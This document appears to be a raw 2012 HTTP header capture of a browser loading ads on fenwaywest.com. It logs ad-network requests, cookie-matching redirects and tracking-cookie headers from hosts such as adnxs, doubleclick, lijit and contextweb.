GET /ptj?member=514&amp;size=300x250&amp;referrer=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2Fbdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html&amp;inv_code=653070&amp;redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D653070%26r%3D0%26_salt%3D115542970%26u%3Dhttp%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252Fbdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html%26u%3Dhttp%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2Fbdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/bdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]14FQUoEhxBTqzB-6V-ZbE(V4S@'0FP`9QQoY]&gt;5y9nKjMD7)=Bn$9U.B!+^@bhR!vJ; sess=1; icu=ChII4LcDEAoYASABKAEw4eWmhQUKEgjrhgQQChgCIAIoAjDl5aaFBRDl5aaFBRgC; acb141525=![nC'XI()vG)#E&lt;0nf8M-odmF?enc=AAAAAAAA4D8zMzMzMzPbPwAAAAAAAOA_MzMzMzMz2z8AAAAAAADgP0Z8MTD2gf9soArzhH1cTlHisqlQAAAAAKyWCAACAgAANQEAAAIAAAALpjYA51gBAAAAAQBVU0QAVVNEAKAAWAIHXAAA2k8BAgUCAQUAAAAAPRohpgAAAAA.&amp;tt_code=653070&amp;cnd=%21Mx-g3QiC7CQQi8zaARgAIOexBTAAOIe4AUAASLUCUKytIlgAYNgGaABwpAF4OoABihSIATqQAQGYAQGgAQGoAQOwAQC5AQAAAAAAAOA_wQEAAAAAAADgP8kBmpmZmZmZuT_ZAQAAAAAAAPA_4AEA&amp;udj=uf%28%27a%27%2C+40624%2C+1353298658%29%3Buf%28%27r%27%2C+3581451%2C+1353298658%29%3Bppv%2827656%2C+%277854139169527921734%27%2C+1353298658%2C+1353557858%2C+603650%2C+88295%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21sgWWMQiC7CQQi8zaARjnsQUgAA..&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; acb781631=![nC'208WMH_XsA&gt;bPMv.la1I?enc=AAAAAAAA8D8zMzMzMzPrPwAAAAAAAPA_MzMzMzMz6z8AAAAAAADwP6YtCyYrnZ5yoArzhH1cTlHlsqlQAAAAAK-WCAACAgAANQEAAAIAAAAHpjYA51gBAAAAAQBVU0QAVVNEACwB-gAHXAAAvk0BAgUCAQUAAAAAdRnNaAAAAAA.&amp;tt_code=1651067&amp;cnd=%215B_-FAiC7CQQh8zaARgAIOexBTAAOIe4AUAASLUCUK-tIlgAYNgGaABwlAZ41gGAAYoUiAE6kAEBmAEBoAEBqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmbk_2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+40624%2C+1353298661%29%3Buf%28%27r%27%2C+3581447%2C+1353298661%29%3Bppv%2827656%2C+%278259211575291489702%27%2C+1353298661%2C+1353557861%2C+603650%2C+88295%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21rgVuMQiC7CQQh8zaARjnsQUgAA..&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sun, 17-Feb-2013 04:17:42 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Tue, 20-Nov-2012 04:17:42 GMT; domain=.adnxs.com; HttpOnly icu=ChII4LcDEAoYASABKAEw4eWmhQUKEgjrhgQQChgDIAMoAzDm5aaFBRDm5aaFBRgD; path=/; expires=Sun, 17-Feb-2013 04:17:42 GMT; domain=.adnxs.com; HttpOnly acb736745=![nC'208WMHC=j@E/qX3/1#:J?enc=MzMzMzMz8z9SuB6F61HwPwAAAEAzM_M_UrgehetR8D8zMzMzMzPzPxpzuWDUr9dgoArzhH1cTlHmsqlQAAAAAKyWCAACAgAANQEAAAIAAAAHpjYA51gBAAAAAQBVU0QAVVNEACwB-gAHXAAAIE8BAgUCAQUAAAAA5iDVpQAAAAA.&amp;tt_code=653070&amp;cnd=%21SyLVZAiC7CQQh8zaARgAIOexBTAAOIe4AUAASLUCUKytIlgAYNgGaABwlAZ41gGAAYoUiAE6kAEBmAEBoAEBqAEDsAEAuQEzMzMzMzPzP8EBMzMzMzMz8z_JAZqZmZmZmbk_2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+40624%2C+1353298662%29%3Buf%28%27r%27%2C+3581447%2C+1353298662%29%3Bppv%2827656%2C+%276978239474324566810%27%2C+1353298662%2C+1353557862%2C+603650%2C+88295%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21rgVuMQiC7CQQh8zaARjnsQUgAA..&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; path=/; expires=Tue, 20-Nov-2012 04:17:42 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG7DHCxrx)0s]#%2L_'x%SEV/hnK)x4FQUoEhxBTqzB-6V-ZbE(V4S@'0FP`9QQQQAn*$l!B)c&gt;.#QydEnS'Jn!wd6!:(Q!%64(.; path=/; expires=Sun, 17-Feb-2013 04:17:42 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 19 Nov 2012 04:17:42 GMT
Content-Length: 540
GET /pixel?google_nid=appnexus1&google_sc&google_hm=NTg1ODcyMTg1OTQyNjc4MTg1Ng%3D%3D HTTP/1.1

Host: cm.g.doubleclick.net
GET /pixel?google_nid=appnexus1&amp;google_sc&amp;google_hm=NTg1ODcyMTg1OTQyNjc4MTg1Ng%3D%3D HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Location: http://adx.adnxs.com/mapuid?member=181&amp;user=
Date: Mon, 19 Nov 2012 04:17:42 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Server: Cookie Matcher
Content-Length: 245
X-XSS-Protection: 1; mode=block
GET /merge?3pid=db273952-68a4-4097-8df2-7d98b16e5711&pid=11 HTTP/1.1

Host: ce.lijit.com
GET /merge?3pid=db273952-68a4-4097-8df2-7d98b16e5711&amp;pid=11 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=1353298658700ebc440fd1c19&amp;rand=1353298658700&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: ljt_reader=193e6b4996885915ffee71e118a270a4; ljtrtb=eJwNycERgDAIBMBe7u0DEuCC3cSBKjL2rvvdA8UNC1kSybRJUU7NxAWdf7nsfEaH2druUkU2RxfeD3xNDcE%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:42 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljtrtb=eJwVy8ENxDAIBdFeOK8lwMCH7cYW3iZW6T3J%2Bc38SehLFpwchbIJFkypog%2FJfMh51dYTZrncuRs40NOvv2tvxSzXEblsGBdG9k8HunJLHMeTXTeqZxfa; expires=Tue, 19-Nov-2013 04:17:42 GMT; path=/; domain=.lijit.com
Content-Length: 43
Expires: Tue, 20 Nov 2012 04:17:42 GMT
Connection: close
GET /bh/rtset?do=add&pid=531292&ev=BM-00000003256334509&rurl=http%3A%2F%2Fm.xp1.ru4.com%2Fmeta%3F_o%3D179638%26_t%3Ddm%26ssv_p%3Dcw%26ssv_u%3DBM-00000003256334509 HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=531292&amp;ev=BM-00000003256334509&amp;rurl=http%3A%2F%2Fm.xp1.ru4.com%2Fmeta%3F_o%3D179638%26_t%3Ddm%26ssv_p%3Dcw%26ssv_u%3DBM-00000003256334509 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: C2W4=3-a1bVT-F6HJlfJrS7NCZfQtTK0a0zp6fORVU9k057LWIC9-6ST6pzQ; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353298784332; V=Cp3qDslEoSFB; vf=2; wf=0; pb_rtb_ev=2-535461.4608069794370173199.0.0.1353298661541|530731..0.0.1353298658421|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301..0.0.1353298658421|535393..0.0.1353298658421|541254..0.0.1353298658421|537085..0.0.1353298658421|543921..0.0.1353298658421|536088..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979.5858721859426781856.0.0.1353298661823|531292..0.0.1353298658421|543604..0.0.1353298658421|535039..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583..0.0.1353298658421|547259..0.0.1353298658421; 66901_300X250__POSUNKNOWNXUNKNOWN=1353298786770
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-115-50-182
Date: Mon, 19 Nov 2012 04:17:42 GMT
Expires: -1
Location: http://m.xp1.ru4.com/meta?_o=179638&amp;_t=dm&amp;ssv_p=cw&amp;ssv_u=BM-00000003256334509
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=Cp3qDslEoSFB; Domain=.contextweb.com; Expires=Thu, 14-Nov-2013 04:17:43 GMT; Path=/ pb_rtb_ev=2-530731..0.0.1353298658421|535461.4608069794370173199.0.0.1353298661541|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301..0.0.1353298658421|535393..0.0.1353298658421|537085..0.0.1353298658421|541254..0.0.1353298658421|536088..0.0.1353298658421|543921..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979.5858721859426781856.0.0.1353298661823|531292.BM-00000003256334509.0.0.1353298663022|535039..0.0.1353298658421|543604..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583..0.0.1353298658421|547259..0.0.1353298658421; Domain=.contextweb.com; Expires=Tue, 19-Nov-2013 04:17:43 GMT; Path=/
Content-Length: 239
Connection: keep-alive
GET /track/cmf/contextweb HTTP/1.1

Host: match.adsrvr.org

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 302 Found

Content-Type: text/html
Cache-Control: private,no-cache, must-revalidate
Date: Mon, 19 Nov 2012 04:17:42 GMT
Location: http://match.adsrvr.org/track/cmb/contextweb?
P3P: CP=&quot;NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV&quot;
Pragma: no-cache
Server: Microsoft-IIS/7.5
Set-Cookie: TDID=71a3945c-1742-4347-b6e7-48a1509b5fa0; domain=.adsrvr.org; expires=Tue, 19-Nov-2013 04:17:42 GMT; path=/ TDCPM=CAEYBSgCMgsI8ODF+dWLijAQBQ==; domain=.adsrvr.org; expires=Tue, 19-Nov-2013 04:17:42 GMT; path=/
X-AspNet-Version: 4.0.30319
Content-Length: 121
Connection: keep-alive
GET /templates/yoo_bigeasy/images/layout_separator.png HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.fenwaywest.com/templates/yoo_bigeasy/css/layout.css
Cookie: __qca=P0-1109205847-1353298656085; cto_rtt=; UnicaNIODID=iYQ8T442WFr-XzLhPSG; __utma=54302783.757114296.1353298659.1353298659.1353298659.1; __utmb=54302783.1.9.1353298659; __utmc=54302783; __utmz=54302783.1353298659.1.1.utmcsr=88websitedesign.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:42 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 28 Jun 2012 12:19:52 GMT
Etag: &quot;eccb40-61-4c387593cca00&quot;
Accept-Ranges: bytes
Content-Length: 97
Keep-Alive: timeout=5, max=496
Connection: Keep-Alive
GET /iframe3?dxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAACBnhSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABnl-sqZpfyDOwpO0Qmtn.Ij9GlQg6LUP-tDMVRAAAAAA==,,http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php,Z%3D300x250%26_salt%3D698192661%26anmember%3D514%26anprice%3D80%26r%3D0%26s%3D1651067,10146920-3200-11e2-9fc0-1cc1def0ff7e,1353298662569 HTTP/1.1

Host: ad.yieldmanager.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: testbounce=testing; BX=4leg2ah8ajcn5&amp;b=3&amp;s=05&amp;t=323; uid=uid=0faa594a-3200-11e2-a63c-3c4a92f73a52&amp;_hmacv=1&amp;_salt=2355797717&amp;_keyid=k1&amp;_hmac=88d94038a1661dd49604c657f05bcd10198581d9; RMBX=4leg2ah8ajcn5&amp;b=3&amp;s=05&amp;t=323
HTTP/1.1 200 OK

Content-Type: text/html
Date: Mon, 19 Nov 2012 04:17:42 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0129.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Mon, 19 Nov 2012 04:17:42 GMT
Expires: Mon, 19 Nov 2012 04:17:42 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /mapuid?member=181&user= HTTP/1.1

Host: adx.adnxs.com
GET /mapuid?member=181&amp;user= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7DHCxrx)0s]#%2L_'x%SEV/hnK)x4FQUoEhxBTqzB-6V-ZbE(V4S@'0FP`9QQQQAn*$l!B)c&gt;.#QydEnS'Jn!wd6!:(Q!%64(.; sess=1; icu=ChII4LcDEAoYASABKAEw4eWmhQUKEgjrhgQQChgDIAMoAzDm5aaFBRDm5aaFBRgD; acb141525=![nC'XI()vG)#E&lt;0nf8M-odmF?enc=AAAAAAAA4D8zMzMzMzPbPwAAAAAAAOA_MzMzMzMz2z8AAAAAAADgP0Z8MTD2gf9soArzhH1cTlHisqlQAAAAAKyWCAACAgAANQEAAAIAAAALpjYA51gBAAAAAQBVU0QAVVNEAKAAWAIHXAAA2k8BAgUCAQUAAAAAPRohpgAAAAA.&amp;tt_code=653070&amp;cnd=%21Mx-g3QiC7CQQi8zaARgAIOexBTAAOIe4AUAASLUCUKytIlgAYNgGaABwpAF4OoABihSIATqQAQGYAQGgAQGoAQOwAQC5AQAAAAAAAOA_wQEAAAAAAADgP8kBmpmZmZmZuT_ZAQAAAAAAAPA_4AEA&amp;udj=uf%28%27a%27%2C+40624%2C+1353298658%29%3Buf%28%27r%27%2C+3581451%2C+1353298658%29%3Bppv%2827656%2C+%277854139169527921734%27%2C+1353298658%2C+1353557858%2C+603650%2C+88295%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21sgWWMQiC7CQQi8zaARjnsQUgAA..&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; acb781631=![nC'208WMH_XsA&gt;bPMv.la1I?enc=AAAAAAAA8D8zMzMzMzPrPwAAAAAAAPA_MzMzMzMz6z8AAAAAAADwP6YtCyYrnZ5yoArzhH1cTlHlsqlQAAAAAK-WCAACAgAANQEAAAIAAAAHpjYA51gBAAAAAQBVU0QAVVNEACwB-gAHXAAAvk0BAgUCAQUAAAAAdRnNaAAAAAA.&amp;tt_code=1651067&amp;cnd=%215B_-FAiC7CQQh8zaARgAIOexBTAAOIe4AUAASLUCUK-tIlgAYNgGaABwlAZ41gGAAYoUiAE6kAEBmAEBoAEBqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmbk_2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+40624%2C+1353298661%29%3Buf%28%27r%27%2C+3581447%2C+1353298661%29%3Bppv%2827656%2C+%278259211575291489702%27%2C+1353298661%2C+1353557861%2C+603650%2C+88295%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21rgVuMQiC7CQQh8zaARjnsQUgAA..&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; acb736745=![nC'208WMHC=j@E/qX3/1#:J?enc=MzMzMzMz8z9SuB6F61HwPwAAAEAzM_M_UrgehetR8D8zMzMzMzPzPxpzuWDUr9dgoArzhH1cTlHmsqlQAAAAAKyWCAACAgAANQEAAAIAAAAHpjYA51gBAAAAAQBVU0QAVVNEACwB-gAHXAAAIE8BAgUCAQUAAAAA5iDVpQAAAAA.&amp;tt_code=653070&amp;cnd=%21SyLVZAiC7CQQh8zaARgAIOexBTAAOIe4AUAASLUCUKytIlgAYNgGaABwlAZ41gGAAYoUiAE6kAEBmAEBoAEBqAEDsAEAuQEzMzMzMzPzP8EBMzMzMzMz8z_JAZqZmZmZmbk_2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+40624%2C+1353298662%29%3Buf%28%27r%27%2C+3581447%2C+1353298662%29%3Bppv%2827656%2C+%276978239474324566810%27%2C+1353298662%2C+1353557862%2C+603650%2C+88295%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21rgVuMQiC7CQQh8zaARjnsQUgAA..&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sun, 17-Feb-2013 04:17:42 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Tue, 20-Nov-2012 04:17:42 GMT; domain=.adnxs.com; HttpOnly uuid2=5858721859426781856; path=/; expires=Sun, 17-Feb-2013 04:17:42 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Date: Mon, 19 Nov 2012 04:17:42 GMT
GET /00/72/26/adserv_2672.js?ad_size=160x600&referrer=http%3A//ad.yieldmanager.com/iframe3%3FbV5bEg73CQDE7YEAAAAAAO.-IAAAAAAAAgAAAAoAAAAAAP8AAAACBnhSEwAAAAAAlWQrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnxEqrZZfyDOO0V2t1xdAjbOQCb-ysJXB92.sNAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252Fbackuptags%252F520266%252F00259a8d-0f3c-4e40-8e92-68482cb19d04lijit_scraper..html%2CB%253D1%2526Z%253D160x600%2526_salt%253D1488817%2526anmember%253D514%2526anprice%253D40%2526r%253D0%2526s%253D653070%2C0fabe2ec-3200-11e2-9d8b-3c4a92f73a52%2C1353298661884&nsafe=general&reftype=adnetwork&disp=iframe&tmiv=1&tcb=0.4042896818223016 HTTP/1.1

Host: uat-net.technoratimedia.com
GET /00/72/26/adserv_2672.js?ad_size=160x600&amp;referrer=http%3A//ad.yieldmanager.com/iframe3%3FbV5bEg73CQDE7YEAAAAAAO.-IAAAAAAAAgAAAAoAAAAAAP8AAAACBnhSEwAAAAAAlWQrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnxEqrZZfyDOO0V2t1xdAjbOQCb-ysJXB92.sNAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252Fbackuptags%252F520266%252F00259a8d-0f3c-4e40-8e92-68482cb19d04lijit_scraper..html%2CB%253D1%2526Z%253D160x600%2526_salt%253D1488817%2526anmember%253D514%2526anprice%253D40%2526r%253D0%2526s%253D653070%2C0fabe2ec-3200-11e2-9d8b-3c4a92f73a52%2C1353298661884&amp;nsafe=general&amp;reftype=adnetwork&amp;disp=iframe&amp;tmiv=1&amp;tcb=0.4042896818223016 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://r1.ace.advertising.com/ctst=1/site=782471/size=160600/u=2/bnum=70770769/wkhr=29/hr=5/hl=1/scres=5/swh=1176x885/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/dref=http%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Set-Cookie: tads_uid=839656B2FC05473098555B1265D9DDB9; Expires=Sat, 18-Nov-17 04:17:42 GMT; Path=/; Domain=.technoratimedia.com
tads_uid_cd=20121118201742-0800; Expires=Sat, 18-Nov-17 04:17:42 GMT; Path=/; Domain=.technoratimedia.com
tads_zora=1|15663|1; Expires=Tue, 20-Nov-12 04:17:42 GMT; Path=/; Domain=.technoratimedia.com
tads_au=&quot;1|CAE=&quot;; Expires=Sat, 18-Nov-17 04:17:42 GMT; Path=/; Domain=.technoratimedia.com
Connection: Keep-Alive
Content-Encoding: gzip
Content-Length: 3115
X-Via: CN-5000
GET /track/cmb/contextweb? HTTP/1.1

Host: match.adsrvr.org

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: TDID=71a3945c-1742-4347-b6e7-48a1509b5fa0; TDCPM=CAEYBSgCMgsI8ODF+dWLijAQBQ==
HTTP/1.1 302 Found

Content-Type: text/html
Cache-Control: private,no-cache, must-revalidate
Date: Mon, 19 Nov 2012 04:17:42 GMT
Location: http://bh.contextweb.com/bh/rtset?do=add&amp;pid=534301&amp;ev=71a3945c-1742-4347-b6e7-48a1509b5fa0
P3P: CP=&quot;NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV&quot;
Pragma: no-cache
Server: Microsoft-IIS/7.5
Set-Cookie: TDID=71a3945c-1742-4347-b6e7-48a1509b5fa0; domain=.adsrvr.org; expires=Tue, 19-Nov-2013 04:17:42 GMT; path=/ TDCPM=CAESGQoKY29udGV4dHdlYhILCOz5+8y/i4owEAUYBSABKAIyCwjw4MX51YuKMBAF; domain=.adsrvr.org; expires=Tue, 19-Nov-2013 04:17:42 GMT; path=/
X-AspNet-Version: 4.0.30319
Content-Length: 213
Connection: keep-alive
GET /bh/rtset?do=add&pid=534301&ev=71a3945c-1742-4347-b6e7-48a1509b5fa0 HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=534301&amp;ev=71a3945c-1742-4347-b6e7-48a1509b5fa0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
